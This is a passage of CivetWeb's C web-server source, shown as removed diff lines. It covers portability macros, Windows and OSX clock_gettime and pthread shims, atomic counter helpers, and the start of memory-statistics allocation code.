-/* function has been selected for automatic inline expansion */
-#pragma warning(disable : 4711)
-#endif
-
-
-/* This code uses static_assert to check some conditions.
- * Unfortunately some compilers still do not support it, so we have a
- * replacement function here. */
-#if defined(_MSC_VER) && (_MSC_VER >= 1600)
-#define mg_static_assert static_assert
-#elif defined(__cplusplus) && (__cplusplus >= 201103L)
-#define mg_static_assert static_assert
-#elif defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 201112L)
-#define mg_static_assert _Static_assert
-#else
-char static_assert_replacement[1];
-#define mg_static_assert(cond, txt)                                            \
-	extern char static_assert_replacement[(cond) ? 1 : -1]
-#endif
-
-mg_static_assert(sizeof(int) == 4 || sizeof(int) == 8,
-                 "int data type size check");
-mg_static_assert(sizeof(void *) == 4 || sizeof(void *) == 8,
-                 "pointer data type size check");
-mg_static_assert(sizeof(void *) >= sizeof(int), "data type size check");
-
-
-/* Alternative queue is well tested and should be the new default */
-#ifdef NO_ALTERNATIVE_QUEUE
-#ifdef ALTERNATIVE_QUEUE
-#error "Define ALTERNATIVE_QUEUE or NO_ALTERNATIVE_QUEUE or none, but not both"
-#endif
-#else
-#define ALTERNATIVE_QUEUE
-#endif
-
-
-/* DTL -- including winsock2.h works better if lean and mean */
-#ifndef WIN32_LEAN_AND_MEAN
-#define WIN32_LEAN_AND_MEAN
-#endif
-
-#if defined(__SYMBIAN32__)
-/* According to https://en.wikipedia.org/wiki/Symbian#History,
- * Symbian is no longer maintained since 2014-01-01.
- * Recent versions of CivetWeb are no longer tested for Symbian.
- * It makes no sense, to support an abandoned operating system.
- * All remaining "#ifdef __SYMBIAN__" cases will be droped from
- * the code sooner or later.
- */
-#pragma message                                                                \
-    "Symbian is no longer maintained. CivetWeb will drop Symbian support."
-#define NO_SSL /* SSL is not supported */
-#define NO_CGI /* CGI is not supported */
-#define PATH_MAX FILENAME_MAX
-#endif /* __SYMBIAN32__ */
-
-
-#ifndef CIVETWEB_HEADER_INCLUDED
-/* Include the header file here, so the CivetWeb interface is defined for the
- * entire implementation, including the following forward definitions. */
-#include "civetweb.h"
-#endif
-
-
-#ifndef IGNORE_UNUSED_RESULT
-#define IGNORE_UNUSED_RESULT(a) ((void)((a) && 1))
-#endif
-
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-
-/* GCC unused function attribute seems fundamentally broken.
- * Several attempts to tell the compiler "THIS FUNCTION MAY BE USED
- * OR UNUSED" for individual functions failed.
- * Either the compiler creates an "unused-function" warning if a
- * function is not marked with __attribute__((unused)).
- * On the other hand, if the function is marked with this attribute,
- * but is used, the compiler raises a completely idiotic
- * "used-but-marked-unused" warning - and
- *   #pragma GCC diagnostic ignored "-Wused-but-marked-unused"
- * raises error: unknown option after ‘#pragma GCC diagnostic’.
- * Disable this warning completely, until the GCC guys sober up
- * again.
- */
-
-#pragma GCC diagnostic ignored "-Wunused-function"
-
-#define FUNCTION_MAY_BE_UNUSED /* __attribute__((unused)) */
-
-#else
-#define FUNCTION_MAY_BE_UNUSED
-#endif
-
-
-#ifndef _WIN32_WCE /* Some ANSI #includes are not available on Windows CE */
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <errno.h>
-#include <signal.h>
-#include <fcntl.h>
-#endif /* !_WIN32_WCE */
-
-
-#ifdef __clang__
-/* When using -Weverything, clang does not accept it's own headers
- * in a release build configuration. Disable what is too much in
- * -Weverything. */
-#pragma clang diagnostic ignored "-Wdisabled-macro-expansion"
-#endif
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Who on earth came to the conclusion, using __DATE__ should rise
- * an "expansion of date or time macro is not reproducible"
- * warning. That's exactly what was intended by using this macro.
- * Just disable this nonsense warning. */
-
-/* And disabling them does not work either:
- * #pragma clang diagnostic ignored "-Wno-error=date-time"
- * #pragma clang diagnostic ignored "-Wdate-time"
- * So we just have to disable ALL warnings for some lines
- * of code.
- */
-#endif
-
-
-#ifdef __MACH__ /* Apple OSX section */
-
-#ifdef __clang__
-#if (__clang_major__ == 3) && ((__clang_minor__ == 7) || (__clang_minor__ == 8))
-/* Avoid warnings for Xcode 7. It seems it does no longer exist in Xcode 8 */
-#pragma clang diagnostic ignored "-Wno-reserved-id-macro"
-#pragma clang diagnostic ignored "-Wno-keyword-macro"
-#endif
-#endif
-
-#define CLOCK_MONOTONIC (1)
-#define CLOCK_REALTIME (2)
-
-#include <sys/errno.h>
-#include <sys/time.h>
-#include <mach/clock.h>
-#include <mach/mach.h>
-#include <mach/mach_time.h>
-#include <assert.h>
-
-/* clock_gettime is not implemented on OSX prior to 10.12 */
-static int
-_civet_clock_gettime(int clk_id, struct timespec *t)
-{
-	memset(t, 0, sizeof(*t));
-	if (clk_id == CLOCK_REALTIME) {
-		struct timeval now;
-		int rv = gettimeofday(&now, NULL);
-		if (rv) {
-			return rv;
-		}
-		t->tv_sec = now.tv_sec;
-		t->tv_nsec = now.tv_usec * 1000;
-		return 0;
-
-	} else if (clk_id == CLOCK_MONOTONIC) {
-		static uint64_t clock_start_time = 0;
-		static mach_timebase_info_data_t timebase_ifo = {0, 0};
-
-		uint64_t now = mach_absolute_time();
-
-		if (clock_start_time == 0) {
-			kern_return_t mach_status = mach_timebase_info(&timebase_ifo);
-#if defined(DEBUG)
-			assert(mach_status == KERN_SUCCESS);
-#else
-			/* appease "unused variable" warning for release builds */
-			(void)mach_status;
-#endif
-			clock_start_time = now;
-		}
-
-		now = (uint64_t)((double)(now - clock_start_time)
-		                 * (double)timebase_ifo.numer
-		                 / (double)timebase_ifo.denom);
-
-		t->tv_sec = now / 1000000000;
-		t->tv_nsec = now % 1000000000;
-		return 0;
-	}
-	return -1; /* EINVAL - Clock ID is unknown */
-}
-
-/* if clock_gettime is declared, then __CLOCK_AVAILABILITY will be defined */
-#ifdef __CLOCK_AVAILABILITY
-/* If we compiled with Mac OSX 10.12 or later, then clock_gettime will be
- * declared but it may be NULL at runtime. So we need to check before using
- * it. */
-static int
-_civet_safe_clock_gettime(int clk_id, struct timespec *t)
-{
-	if (clock_gettime) {
-		return clock_gettime(clk_id, t);
-	}
-	return _civet_clock_gettime(clk_id, t);
-}
-#define clock_gettime _civet_safe_clock_gettime
-#else
-#define clock_gettime _civet_clock_gettime
-#endif
-
-#endif
-
-
-#include <time.h>
-#include <stdlib.h>
-#include <stdarg.h>
-#include <assert.h>
-#include <string.h>
-#include <ctype.h>
-#include <limits.h>
-#include <stddef.h>
-#include <stdio.h>
-#include <stdint.h>
-
-#ifndef INT64_MAX
-#define INT64_MAX (9223372036854775807)
-#endif
-
-
-#ifndef MAX_WORKER_THREADS
-#define MAX_WORKER_THREADS (1024 * 64)
-#endif
-
-#ifndef SOCKET_TIMEOUT_QUANTUM /* in ms */
-#define SOCKET_TIMEOUT_QUANTUM (2000)
-#endif
-
-#define SHUTDOWN_RD (0)
-#define SHUTDOWN_WR (1)
-#define SHUTDOWN_BOTH (2)
-
-mg_static_assert(MAX_WORKER_THREADS >= 1,
-                 "worker threads must be a positive number");
-
-mg_static_assert(sizeof(size_t) == 4 || sizeof(size_t) == 8,
-                 "size_t data type size check");
-
-#if defined(_WIN32)                                                            \
-    && !defined(__SYMBIAN32__) /* WINDOWS / UNIX include block */
-#include <windows.h>
-#include <winsock2.h> /* DTL add for SO_EXCLUSIVE */
-#include <ws2tcpip.h>
-
-typedef const char *SOCK_OPT_TYPE;
-
-#if !defined(PATH_MAX)
-#define PATH_MAX (MAX_PATH)
-#endif
-
-#if !defined(PATH_MAX)
-#define PATH_MAX (4096)
-#endif
-
-mg_static_assert(PATH_MAX >= 1, "path length must be a positive number");
-
-#ifndef _IN_PORT_T
-#ifndef in_port_t
-#define in_port_t u_short
-#endif
-#endif
-
-#ifndef _WIN32_WCE
-#include <process.h>
-#include <direct.h>
-#include <io.h>
-#else            /* _WIN32_WCE */
-#define NO_CGI   /* WinCE has no pipes */
-#define NO_POPEN /* WinCE has no popen */
-
-typedef long off_t;
-
-#define errno ((int)(GetLastError()))
-#define strerror(x) (_ultoa(x, (char *)_alloca(sizeof(x) * 3), 10))
-#endif /* _WIN32_WCE */
-
-#define MAKEUQUAD(lo, hi)                                                      \
-	((uint64_t)(((uint32_t)(lo)) | ((uint64_t)((uint32_t)(hi))) << 32))
-#define RATE_DIFF (10000000) /* 100 nsecs */
-#define EPOCH_DIFF (MAKEUQUAD(0xd53e8000, 0x019db1de))
-#define SYS2UNIX_TIME(lo, hi)                                                  \
-	((time_t)((MAKEUQUAD((lo), (hi)) - EPOCH_DIFF) / RATE_DIFF))
-
-/* Visual Studio 6 does not know __func__ or __FUNCTION__
- * The rest of MS compilers use __FUNCTION__, not C99 __func__
- * Also use _strtoui64 on modern M$ compilers */
-#if defined(_MSC_VER)
-#if (_MSC_VER < 1300)
-#define STRX(x) #x
-#define STR(x) STRX(x)
-#define __func__ __FILE__ ":" STR(__LINE__)
-#define strtoull(x, y, z) ((unsigned __int64)_atoi64(x))
-#define strtoll(x, y, z) (_atoi64(x))
-#else
-#define __func__ __FUNCTION__
-#define strtoull(x, y, z) (_strtoui64(x, y, z))
-#define strtoll(x, y, z) (_strtoi64(x, y, z))
-#endif
-#endif /* _MSC_VER */
-
-#define ERRNO ((int)(GetLastError()))
-#define NO_SOCKLEN_T
-
-#if defined(_WIN64) || defined(__MINGW64__)
-#define SSL_LIB "ssleay64.dll"
-#define CRYPTO_LIB "libeay64.dll"
-#else
-#define SSL_LIB "ssleay32.dll"
-#define CRYPTO_LIB "libeay32.dll"
-#endif
-
-#define O_NONBLOCK (0)
-#ifndef W_OK
-#define W_OK (2) /* http://msdn.microsoft.com/en-us/library/1w06ktdy.aspx */
-#endif
-#if !defined(EWOULDBLOCK)
-#define EWOULDBLOCK WSAEWOULDBLOCK
-#endif /* !EWOULDBLOCK */
-#define _POSIX_
-#define INT64_FMT "I64d"
-#define UINT64_FMT "I64u"
-
-#define WINCDECL __cdecl
-#define vsnprintf_impl _vsnprintf
-#define access _access
-#define mg_sleep(x) (Sleep(x))
-
-#define pipe(x) _pipe(x, MG_BUF_LEN, _O_BINARY)
-#ifndef popen
-#define popen(x, y) (_popen(x, y))
-#endif
-#ifndef pclose
-#define pclose(x) (_pclose(x))
-#endif
-#define close(x) (_close(x))
-#define dlsym(x, y) (GetProcAddress((HINSTANCE)(x), (y)))
-#define RTLD_LAZY (0)
-#define fseeko(x, y, z) ((_lseeki64(_fileno(x), (y), (z)) == -1) ? -1 : 0)
-#define fdopen(x, y) (_fdopen((x), (y)))
-#define write(x, y, z) (_write((x), (y), (unsigned)z))
-#define read(x, y, z) (_read((x), (y), (unsigned)z))
-#define flockfile(x) (EnterCriticalSection(&global_log_file_lock))
-#define funlockfile(x) (LeaveCriticalSection(&global_log_file_lock))
-#define sleep(x) (Sleep((x)*1000))
-#define rmdir(x) (_rmdir(x))
-#define timegm(x) (_mkgmtime(x))
-
-#if !defined(fileno)
-#define fileno(x) (_fileno(x))
-#endif /* !fileno MINGW #defines fileno */
-
-typedef HANDLE pthread_mutex_t;
-typedef DWORD pthread_key_t;
-typedef HANDLE pthread_t;
-typedef struct {
-	CRITICAL_SECTION threadIdSec;
-	struct mg_workerTLS *waiting_thread; /* The chain of threads */
-} pthread_cond_t;
-
-#ifndef __clockid_t_defined
-typedef DWORD clockid_t;
-#endif
-#ifndef CLOCK_MONOTONIC
-#define CLOCK_MONOTONIC (1)
-#endif
-#ifndef CLOCK_REALTIME
-#define CLOCK_REALTIME (2)
-#endif
-#ifndef CLOCK_THREAD
-#define CLOCK_THREAD (3)
-#endif
-#ifndef CLOCK_PROCESS
-#define CLOCK_PROCESS (4)
-#endif
-
-
-#if defined(_MSC_VER) && (_MSC_VER >= 1900)
-#define _TIMESPEC_DEFINED
-#endif
-#ifndef _TIMESPEC_DEFINED
-struct timespec {
-	time_t tv_sec; /* seconds */
-	long tv_nsec;  /* nanoseconds */
-};
-#endif
-
-#if !defined(WIN_PTHREADS_TIME_H)
-#define MUST_IMPLEMENT_CLOCK_GETTIME
-#endif
-
-#ifdef MUST_IMPLEMENT_CLOCK_GETTIME
-#define clock_gettime mg_clock_gettime
-static int
-clock_gettime(clockid_t clk_id, struct timespec *tp)
-{
-	FILETIME ft;
-	ULARGE_INTEGER li, li2;
-	BOOL ok = FALSE;
-	double d;
-	static double perfcnt_per_sec = 0.0;
-
-	if (tp) {
-		memset(tp, 0, sizeof(*tp));
-
-		if (clk_id == CLOCK_REALTIME) {
-
-			/* BEGIN: CLOCK_REALTIME = wall clock (date and time) */
-			GetSystemTimeAsFileTime(&ft);
-			li.LowPart = ft.dwLowDateTime;
-			li.HighPart = ft.dwHighDateTime;
-			li.QuadPart -= 116444736000000000; /* 1.1.1970 in filedate */
-			tp->tv_sec = (time_t)(li.QuadPart / 10000000);
-			tp->tv_nsec = (long)(li.QuadPart % 10000000) * 100;
-			ok = TRUE;
-			/* END: CLOCK_REALTIME */
-
-		} else if (clk_id == CLOCK_MONOTONIC) {
-
-			/* BEGIN: CLOCK_MONOTONIC = stopwatch (time differences) */
-			if (perfcnt_per_sec == 0.0) {
-				QueryPerformanceFrequency((LARGE_INTEGER *)&li);
-				perfcnt_per_sec = 1.0 / li.QuadPart;
-			}
-			if (perfcnt_per_sec != 0.0) {
-				QueryPerformanceCounter((LARGE_INTEGER *)&li);
-				d = li.QuadPart * perfcnt_per_sec;
-				tp->tv_sec = (time_t)d;
-				d -= tp->tv_sec;
-				tp->tv_nsec = (long)(d * 1.0E9);
-				ok = TRUE;
-			}
-			/* END: CLOCK_MONOTONIC */
-
-		} else if (clk_id == CLOCK_THREAD) {
-
-			/* BEGIN: CLOCK_THREAD = CPU usage of thread */
-			FILETIME t_create, t_exit, t_kernel, t_user;
-			if (GetThreadTimes(GetCurrentThread(),
-			                   &t_create,
-			                   &t_exit,
-			                   &t_kernel,
-			                   &t_user)) {
-				li.LowPart = t_user.dwLowDateTime;
-				li.HighPart = t_user.dwHighDateTime;
-				li2.LowPart = t_kernel.dwLowDateTime;
-				li2.HighPart = t_kernel.dwHighDateTime;
-				li.QuadPart += li2.QuadPart;
-				tp->tv_sec = (time_t)(li.QuadPart / 10000000);
-				tp->tv_nsec = (long)(li.QuadPart % 10000000) * 100;
-				ok = TRUE;
-			}
-			/* END: CLOCK_THREAD */
-
-		} else if (clk_id == CLOCK_PROCESS) {
-
-			/* BEGIN: CLOCK_PROCESS = CPU usage of process */
-			FILETIME t_create, t_exit, t_kernel, t_user;
-			if (GetProcessTimes(GetCurrentProcess(),
-			                    &t_create,
-			                    &t_exit,
-			                    &t_kernel,
-			                    &t_user)) {
-				li.LowPart = t_user.dwLowDateTime;
-				li.HighPart = t_user.dwHighDateTime;
-				li2.LowPart = t_kernel.dwLowDateTime;
-				li2.HighPart = t_kernel.dwHighDateTime;
-				li.QuadPart += li2.QuadPart;
-				tp->tv_sec = (time_t)(li.QuadPart / 10000000);
-				tp->tv_nsec = (long)(li.QuadPart % 10000000) * 100;
-				ok = TRUE;
-			}
-			/* END: CLOCK_PROCESS */
-
-		} else {
-
-			/* BEGIN: unknown clock */
-			/* ok = FALSE; already set by init */
-			/* END: unknown clock */
-		}
-	}
-
-	return ok ? 0 : -1;
-}
-#endif
-
-
-#define pid_t HANDLE /* MINGW typedefs pid_t to int. Using #define here. */
-
-static int pthread_mutex_lock(pthread_mutex_t *);
-static int pthread_mutex_unlock(pthread_mutex_t *);
-static void path_to_unicode(const struct mg_connection *conn,
-                            const char *path,
-                            wchar_t *wbuf,
-                            size_t wbuf_len);
-
-/* All file operations need to be rewritten to solve #246. */
-
-#include "file_ops.inl"
-
-struct mg_file;
-
-static const char *
-mg_fgets(char *buf, size_t size, struct mg_file *filep, char **p);
-
-
-/* POSIX dirent interface */
-struct dirent {
-	char d_name[PATH_MAX];
-};
-
-typedef struct DIR {
-	HANDLE handle;
-	WIN32_FIND_DATAW info;
-	struct dirent result;
-} DIR;
-
-#if defined(_WIN32) && !defined(POLLIN)
-#ifndef HAVE_POLL
-struct pollfd {
-	SOCKET fd;
-	short events;
-	short revents;
-};
-#define POLLIN (0x0300)
-#endif
-#endif
-
-/* Mark required libraries */
-#if defined(_MSC_VER)
-#pragma comment(lib, "Ws2_32.lib")
-#endif
-
-#else /* defined(_WIN32) && !defined(__SYMBIAN32__) -                          \
-         WINDOWS / UNIX include block */
-
-#include <sys/wait.h>
-#include <sys/socket.h>
-#include <sys/poll.h>
-#include <netinet/in.h>
-#include <arpa/inet.h>
-#include <sys/time.h>
-#include <sys/utsname.h>
-#include <stdint.h>
-#include <inttypes.h>
-#include <netdb.h>
-#include <netinet/tcp.h>
-typedef const void *SOCK_OPT_TYPE;
-
-#if defined(ANDROID)
-typedef unsigned short int in_port_t;
-#endif
-
-#include <pwd.h>
-#include <unistd.h>
-#include <grp.h>
-#include <dirent.h>
-#define vsnprintf_impl vsnprintf
-
-#if !defined(NO_SSL_DL) && !defined(NO_SSL)
-#include <dlfcn.h>
-#endif
-#include <pthread.h>
-#if defined(__MACH__)
-#define SSL_LIB "libssl.dylib"
-#define CRYPTO_LIB "libcrypto.dylib"
-#else
-#if !defined(SSL_LIB)
-#define SSL_LIB "libssl.so"
-#endif
-#if !defined(CRYPTO_LIB)
-#define CRYPTO_LIB "libcrypto.so"
-#endif
-#endif
-#ifndef O_BINARY
-#define O_BINARY (0)
-#endif /* O_BINARY */
-#define closesocket(a) (close(a))
-#define mg_mkdir(conn, path, mode) (mkdir(path, mode))
-#define mg_remove(conn, x) (remove(x))
-#define mg_sleep(x) (usleep((x)*1000))
-#define mg_opendir(conn, x) (opendir(x))
-#define mg_closedir(x) (closedir(x))
-#define mg_readdir(x) (readdir(x))
-#define ERRNO (errno)
-#define INVALID_SOCKET (-1)
-#define INT64_FMT PRId64
-#define UINT64_FMT PRIu64
-typedef int SOCKET;
-#define WINCDECL
-
-#if defined(__hpux)
-/* HPUX 11 does not have monotonic, fall back to realtime */
-#ifndef CLOCK_MONOTONIC
-#define CLOCK_MONOTONIC CLOCK_REALTIME
-#endif
-
-/* HPUX defines socklen_t incorrectly as size_t which is 64bit on
- * Itanium.  Without defining _XOPEN_SOURCE or _XOPEN_SOURCE_EXTENDED
- * the prototypes use int* rather than socklen_t* which matches the
- * actual library expectation.  When called with the wrong size arg
- * accept() returns a zero client inet addr and check_acl() always
- * fails.  Since socklen_t is widely used below, just force replace
- * their typedef with int. - DTL
- */
-#define socklen_t int
-#endif /* hpux */
-
-#endif /* defined(_WIN32) && !defined(__SYMBIAN32__) -                         \
-          WINDOWS / UNIX include block */
-
-/* va_copy should always be a macro, C99 and C++11 - DTL */
-#ifndef va_copy
-#define va_copy(x, y) ((x) = (y))
-#endif
-
-#ifdef _WIN32
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-static CRITICAL_SECTION global_log_file_lock;
-
-FUNCTION_MAY_BE_UNUSED
-static DWORD
-pthread_self(void)
-{
-	return GetCurrentThreadId();
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_key_create(
-    pthread_key_t *key,
-    void (*_ignored)(void *) /* destructor not supported for Windows */
-    )
-{
-	(void)_ignored;
-
-	if ((key != 0)) {
-		*key = TlsAlloc();
-		return (*key != TLS_OUT_OF_INDEXES) ? 0 : -1;
-	}
-	return -2;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_key_delete(pthread_key_t key)
-{
-	return TlsFree(key) ? 0 : 1;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_setspecific(pthread_key_t key, void *value)
-{
-	return TlsSetValue(key, value) ? 0 : 1;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static void *
-pthread_getspecific(pthread_key_t key)
-{
-	return TlsGetValue(key);
-}
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-static struct pthread_mutex_undefined_struct *pthread_mutex_attr = NULL;
-#else
-static pthread_mutexattr_t pthread_mutex_attr;
-#endif /* _WIN32 */
-
-
-#define PASSWORDS_FILE_NAME ".htpasswd"
-#define CGI_ENVIRONMENT_SIZE (4096)
-#define MAX_CGI_ENVIR_VARS (256)
-#define MG_BUF_LEN (8192)
-
-#define ARRAY_SIZE(array) (sizeof(array) / sizeof(array[0]))
-
-
-#if defined(_WIN32_WCE)
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static time_t
-time(time_t *ptime)
-{
-	time_t t;
-	SYSTEMTIME st;
-	FILETIME ft;
-
-	GetSystemTime(&st);
-	SystemTimeToFileTime(&st, &ft);
-	t = SYS2UNIX_TIME(ft.dwLowDateTime, ft.dwHighDateTime);
-
-	if (ptime != NULL) {
-		*ptime = t;
-	}
-
-	return t;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct tm *
-localtime_s(const time_t *ptime, struct tm *ptm)
-{
-	int64_t t = ((int64_t)*ptime) * RATE_DIFF + EPOCH_DIFF;
-	FILETIME ft, lft;
-	SYSTEMTIME st;
-	TIME_ZONE_INFORMATION tzinfo;
-
-	if (ptm == NULL) {
-		return NULL;
-	}
-
-	*(int64_t *)&ft = t;
-	FileTimeToLocalFileTime(&ft, &lft);
-	FileTimeToSystemTime(&lft, &st);
-	ptm->tm_year = st.wYear - 1900;
-	ptm->tm_mon = st.wMonth - 1;
-	ptm->tm_wday = st.wDayOfWeek;
-	ptm->tm_mday = st.wDay;
-	ptm->tm_hour = st.wHour;
-	ptm->tm_min = st.wMinute;
-	ptm->tm_sec = st.wSecond;
-	ptm->tm_yday = 0; /* hope nobody uses this */
-	ptm->tm_isdst =
-	    (GetTimeZoneInformation(&tzinfo) == TIME_ZONE_ID_DAYLIGHT) ? 1 : 0;
-
-	return ptm;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct tm *
-gmtime_s(const time_t *ptime, struct tm *ptm)
-{
-	/* FIXME(lsm): fix this. */
-	return localtime_s(ptime, ptm);
-}
-
-
-static int mg_atomic_inc(volatile int *addr);
-static struct tm tm_array[MAX_WORKER_THREADS];
-static int tm_index = 0;
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct tm *
-localtime(const time_t *ptime)
-{
-	int i = mg_atomic_inc(&tm_index) % (sizeof(tm_array) / sizeof(tm_array[0]));
-	return localtime_s(ptime, tm_array + i);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct tm *
-gmtime(const time_t *ptime)
-{
-	int i = mg_atomic_inc(&tm_index) % ARRAY_SIZE(tm_array);
-	return gmtime_s(ptime, tm_array + i);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static size_t
-strftime(char *dst, size_t dst_size, const char *fmt, const struct tm *tm)
-{
-	/* TODO: (void)mg_snprintf(NULL, dst, dst_size, "implement strftime()
-	 * for WinCE"); */
-	return 0;
-}
-
-#define _beginthreadex(psec, stack, func, prm, flags, ptid)                    \
-	(uintptr_t) CreateThread(psec, stack, func, prm, flags, ptid)
-
-#define remove(f) mg_remove(NULL, f)
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-rename(const char *a, const char *b)
-{
-	wchar_t wa[PATH_MAX];
-	wchar_t wb[PATH_MAX];
-	path_to_unicode(NULL, a, wa, ARRAY_SIZE(wa));
-	path_to_unicode(NULL, b, wb, ARRAY_SIZE(wb));
-
-	return MoveFileW(wa, wb) ? 0 : -1;
-}
-
-
-struct stat {
-	int64_t st_size;
-	time_t st_mtime;
-};
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-stat(const char *name, struct stat *st)
-{
-	wchar_t wbuf[PATH_MAX];
-	WIN32_FILE_ATTRIBUTE_DATA attr;
-	time_t creation_time, write_time;
-
-	path_to_unicode(NULL, name, wbuf, ARRAY_SIZE(wbuf));
-	memset(&attr, 0, sizeof(attr));
-
-	GetFileAttributesExW(wbuf, GetFileExInfoStandard, &attr);
-	st->st_size =
-	    (((int64_t)attr.nFileSizeHigh) << 32) + (int64_t)attr.nFileSizeLow;
-
-	write_time = SYS2UNIX_TIME(attr.ftLastWriteTime.dwLowDateTime,
-	                           attr.ftLastWriteTime.dwHighDateTime);
-	creation_time = SYS2UNIX_TIME(attr.ftCreationTime.dwLowDateTime,
-	                              attr.ftCreationTime.dwHighDateTime);
-
-	if (creation_time > write_time) {
-		st->st_mtime = creation_time;
-	} else {
-		st->st_mtime = write_time;
-	}
-	return 0;
-}
-
-#define access(x, a) 1 /* not required anyway */
-
-/* WinCE-TODO: define stat, remove, rename, _rmdir, _lseeki64 */
-/* Values from errno.h in Windows SDK (Visual Studio). */
-#define EEXIST 17
-#define EACCES 13
-#define ENOENT 2
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-#endif /* defined(_WIN32_WCE) */
-
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#define GCC_VERSION                                                            \
-	(__GNUC__ * 10000 + __GNUC_MINOR__ * 100 + __GNUC_PATCHLEVEL__)
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) || defined(__MINGW32__) */
-#if defined(__clang__)
-/* Show no warning in case system functions are not used. */
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunused-function"
-#endif
-
-static pthread_mutex_t global_lock_mutex;
-
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-/* Forward declaration for Windows */
-FUNCTION_MAY_BE_UNUSED
-static int pthread_mutex_lock(pthread_mutex_t *mutex);
-
-FUNCTION_MAY_BE_UNUSED
-static int pthread_mutex_unlock(pthread_mutex_t *mutex);
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static void
-mg_global_lock(void)
-{
-	(void)pthread_mutex_lock(&global_lock_mutex);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static void
-mg_global_unlock(void)
-{
-	(void)pthread_mutex_unlock(&global_lock_mutex);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-mg_atomic_inc(volatile int *addr)
-{
-	int ret;
-#if defined(_WIN32) && !defined(__SYMBIAN32__) && !defined(NO_ATOMICS)
-	/* Depending on the SDK, this function uses either
-	 * (volatile unsigned int *) or (volatile LONG *),
-	 * so whatever you use, the other SDK is likely to raise a warning. */
-	ret = InterlockedIncrement((volatile long *)addr);
-#elif defined(__GNUC__)                                                        \
-    && ((__GNUC__ > 4) || ((__GNUC__ == 4) && (__GNUC_MINOR__ > 0)))           \
-    && !defined(NO_ATOMICS)
-	ret = __sync_add_and_fetch(addr, 1);
-#else
-	mg_global_lock();
-	ret = (++(*addr));
-	mg_global_unlock();
-#endif
-	return ret;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-mg_atomic_dec(volatile int *addr)
-{
-	int ret;
-#if defined(_WIN32) && !defined(__SYMBIAN32__) && !defined(NO_ATOMICS)
-	/* Depending on the SDK, this function uses either
-	 * (volatile unsigned int *) or (volatile LONG *),
-	 * so whatever you use, the other SDK is likely to raise a warning. */
-	ret = InterlockedDecrement((volatile long *)addr);
-#elif defined(__GNUC__)                                                        \
-    && ((__GNUC__ > 4) || ((__GNUC__ == 4) && (__GNUC_MINOR__ > 0)))           \
-    && !defined(NO_ATOMICS)
-	ret = __sync_sub_and_fetch(addr, 1);
-#else
-	mg_global_lock();
-	ret = (--(*addr));
-	mg_global_unlock();
-#endif
-	return ret;
-}
-
-
-#if defined(USE_SERVER_STATS)
-static int64_t
-mg_atomic_add(volatile int64_t *addr, int64_t value)
-{
-	int64_t ret;
-#if defined(_WIN64) && !defined(__SYMBIAN32__) && !defined(NO_ATOMICS)
-	ret = InterlockedAdd64(addr, value);
-#elif defined(__GNUC__)                                                        \
-    && ((__GNUC__ > 4) || ((__GNUC__ == 4) && (__GNUC_MINOR__ > 0)))           \
-    && !defined(NO_ATOMICS)
-	ret = __sync_add_and_fetch(addr, value);
-#else
-	mg_global_lock();
-	*addr += value;
-	ret = (*addr);
-	mg_global_unlock();
-#endif
-	return ret;
-}
-#endif
-
-
-#if defined(__GNUC__)
-/* Show no warning in case system functions are not used. */
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic pop
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) */
-#if defined(__clang__)
-/* Show no warning in case system functions are not used. */
-#pragma clang diagnostic pop
-#endif
-
-
-#if defined(USE_SERVER_STATS)
-
-struct mg_memory_stat {
-	volatile int64_t totalMemUsed;
-	volatile int64_t maxMemUsed;
-	volatile int blockCount;
-};
-
-
-static struct mg_memory_stat *get_memory_stat(struct mg_context *ctx);
-
-
-static void *
-mg_malloc_ex(size_t size,
-             struct mg_context *ctx,
-             const char *file,
-             unsigned line)
-{
-	void *data = malloc(size + 2 * sizeof(uintptr_t));
-	void *memory = 0;
-	struct mg_memory_stat *mstat = get_memory_stat(ctx);
-
-#if defined(MEMORY_DEBUGGING)
-	char mallocStr[256];
-#else
-	(void)file;
-	(void)line;
-#endif
-
-	if (data) {
-		int64_t mmem = mg_atomic_add(&mstat->totalMemUsed, (int64_t)size);
-		if (mmem > mstat->maxMemUsed) {
-			/* could use atomic compare exchange, but this
-			 * seems overkill for statistics data */
-			mstat->maxMemUsed = mmem;
-		}
-
-		mg_atomic_inc(&mstat->blockCount);
-		((uintptr_t *)data)[0] = size;
-		((uintptr_t *)data)[1] = (uintptr_t)mstat;
